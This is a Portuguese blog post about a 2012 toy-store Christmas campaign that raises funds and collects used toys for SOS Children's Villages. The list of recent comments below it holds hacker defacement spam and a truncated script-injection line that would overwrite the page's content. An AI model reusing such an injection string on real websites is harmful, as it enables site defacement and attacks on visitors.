faca_como_eu @ 13:31

Sex, 09/11/12

“Levar o Natal às Aldeias de Crianças SOS” é o mote da Campanha organizada pela Dreamy World. Entre 27 de outubro e 25 de novembro, a marca irá vender três brinquedos solidários cujas vendas reverterão 100% a favor das Aldeias de Crianças SOS, de modo a também angariar fundos tão importantes para a sustentabilidade do projeto.

Além da venda destes 3 bonecos solidários a Campanha contempla também um pedido de oferta/entrega de brinquedos usados, mas em bom estado, nas três lojas da Dreamy World localizadas no Amoreiras Shopping, Rio Sul Shopping e Fórum Sintra. Juntos, podemos realizar o sonho destes meninos e meninas que merecem todo o amor e carinho para crescerem felizes numa sociedade que os acolhe.


As Aldeias de Crianças SOS foram fundadas, em 1949 por Hermann Gmeiner, na altura da II Guerra Mundial, devido à profunda necessidade de dar aos órfãos da guerra e às crianças abandonadas a proteção de um lar e de uma família. A Associação trabalha no sentido de defender que cada criança deve pertencer a uma família e crescer com amor, respeito e segurança.

 

Veja o vídeo aqui!



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO